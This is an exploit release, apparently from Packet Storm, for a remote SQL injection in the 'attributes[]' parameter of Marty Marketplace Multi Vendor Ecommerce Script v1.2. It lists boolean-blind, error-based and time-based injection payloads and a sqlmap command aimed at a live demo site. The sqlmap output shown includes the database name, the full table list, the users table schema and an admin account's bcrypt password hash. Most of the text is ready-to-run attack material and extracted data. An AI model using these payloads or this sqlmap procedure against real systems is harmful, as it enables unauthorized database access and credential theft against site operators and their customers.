Share
## https://sploitus.com/exploit?id=PACKETSTORM:167796
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”‚โ”‚ C r a C k E r โ”Œโ”˜  
โ”Œโ”˜ T H E C R A C K O F E T E R N A L M I G H T โ”‚โ”‚  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
  
โ”Œโ”€โ”€โ”€โ”€ From The Ashes and Dust Rises An Unimaginable crack.... โ”€โ”€โ”€โ”€โ”  
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”Œโ”˜ [ Exploits ] โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
: Author : CraCkEr โ”‚ โ”‚ :  
โ”‚ Website : sangvish.com โ”‚ โ”‚ โ”‚  
โ”‚ Vendor : SangVish Technologies โ”‚ โ”‚ โ”‚  
โ”‚ Software : Marty Marketplace Multi Vendor โ”‚ โ”‚ Open Source Marketplace PHP script for โ”‚  
โ”‚ Ecommerce Script v1.2 โ”‚ โ”‚ eCommerce marketplace platforms โ”‚  
โ”‚ Vuln Type: Remote SQL Injection โ”‚ โ”‚ in the market โ”‚  
โ”‚ Method : GET โ”‚ โ”‚ โ”‚  
โ”‚ Impact : Database Access โ”‚ โ”‚ โ”‚  
โ”‚ โ”‚ โ”‚ โ”‚  
โ”‚โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”‚  
โ”‚ B4nks-NET irc.b4nks.tk #unix โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
: :  
โ”‚ Release Notes: โ”‚  
โ”‚ โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ”‚  
โ”‚ Typically used for remotely exploitable vulnerabilities that can lead to โ”‚  
โ”‚ system compromise. โ”‚  
โ”‚ โ”‚  
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”Œโ”˜ โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
  
Greets:  
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk  
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear  
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
Special Greetz to The Lebanese National Basketball Team for the results of  
the FIBA Asia Cup  
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”Œโ”˜ ยฉ CraCkEr 2022 โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
  
GET parameter 'attributes[]' is vulnerable  
---  
Parameter: attributes[] (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)  
---  
  
  
Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6  
  
  
[+] Starting the Attack  
  
sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch  
  
  
[+] fetching current database  
  
[INFO] the back-end DBMS is MySQL  
web application technology: Apache  
back-end DBMS: MySQL >= 5.6  
[INFO] retrieved: 'garudan_buy2marty'  
current database: 'garudan_buy2marty'  
  
  
[+] fetching tables for database: 'garudan_buy2marty'  
  
Database: garudan_buy2marty  
[105 tables]  
  
+----------------------------------------+  
| activations |  
| ads |  
| ads_translations |  
| audit_histories |  
| categories |  
| categories_translations |  
| contact_replies |  
| contacts |  
| dashboard_widget_settings |  
| dashboard_widgets |  
| ec_brands |  
| ec_brands_translations |  
| ec_cart |  
| ec_currencies |  
| ec_customer_addresses |  
| ec_customer_password_resets |  
| ec_customers |  
| ec_discount_customers |  
| ec_discount_product_collections |  
| ec_discount_products |  
| ec_discounts |  
| ec_flash_sale_products |  
| ec_flash_sales |  
| ec_flash_sales_translations |  
| ec_grouped_products |  
| ec_order_addresses |  
| ec_order_histories |  
| ec_order_product |  
| ec_orders |  
| ec_product_attribute_sets |  
| ec_product_attribute_sets_translations |  
| ec_product_attributes |  
| ec_product_attributes_translations |  
| ec_product_categories |  
| ec_product_categories_translations |  
| ec_product_category_product |  
| ec_product_collection_products |  
| ec_product_collections |  
| ec_product_collections_translations |  
| ec_product_cross_sale_relations |  
| ec_product_label_products |  
| ec_product_labels |  
| ec_product_labels_translations |  
| ec_product_related_relations |  
| ec_product_tag_product |  
| ec_product_tags |  
| ec_product_tags_translations |  
| ec_product_up_sale_relations |  
| ec_product_variation_items |  
| ec_product_variations |  
| ec_product_with_attribute |  
| ec_product_with_attribute_set |  
| ec_products |  
| ec_products_translations |  
| ec_reviews |  
| ec_shipment_histories |  
| ec_shipments |  
| ec_shipping |  
| ec_shipping_rule_items |  
| ec_shipping_rules |  
| ec_store_locators |  
| ec_taxes |  
| ec_wish_lists |  
| failed_jobs |  
| faq_categories |  
| faq_categories_translations |  
| faqs |  
| faqs_translations |  
| jobs |  
| language_meta |  
| languages |  
| media_files |  
| media_folders |  
| media_settings |  
| menu_locations |  
| menu_nodes |  
| menus |  
| meta_boxes |  
| migrations |  
| mp_customer_revenues |  
| mp_customer_withdrawals |  
| mp_stores |  
| mp_vendor_info |  
| newsletters |  
| pages |  
| pages_translations |  
| password_resets |  
| payments |  
| post_categories |  
| post_tags |  
| posts |  
| posts_translations |  
| revisions |  
| role_users |  
| roles |  
| settings |  
| simple_slider_items |  
| simple_sliders |  
| slugs |  
| tags |  
| tags_translations |  
| translations |  
| user_meta |  
| users |  
| widgets |  
+----------------------------------------+  
  
  
[+] fetching columns for table 'users' in database 'garudan_buy2marty'  
  
Database: garudan_buy2marty  
Table: users  
[15 columns]  
  
+-------------------+---------------------+  
| Column | Type |  
+-------------------+---------------------+  
| avatar_id | int(10) unsigned |  
| created_at | timestamp |  
| email | varchar(191) |  
| email_verified_at | timestamp |  
| first_name | varchar(191) |  
| id | bigint(20) unsigned |  
| last_login | timestamp |  
| last_name | varchar(191) |  
| manage_supers | tinyint(1) |  
| password | varchar(191) |  
| permissions | text |  
| remember_token | varchar(100) |  
| super_user | tinyint(1) |  
| updated_at | timestamp |  
| username | varchar(60) |  
+-------------------+---------------------+  
  
  
[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'  
  
Database: garudan_buy2marty  
Table: users  
[1 entry]  
  
+----+----------+--------------------------------------------------------------+------------+-------------+  
| id | username | password | super_user | permissions |  
+----+----------+--------------------------------------------------------------+------------+-------------+  
| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL |  
+----+----------+--------------------------------------------------------------+------------+-------------+  
Possible algorithms: bcrypt $2*$, Blowfish (Unix)  
  
  
[-] Done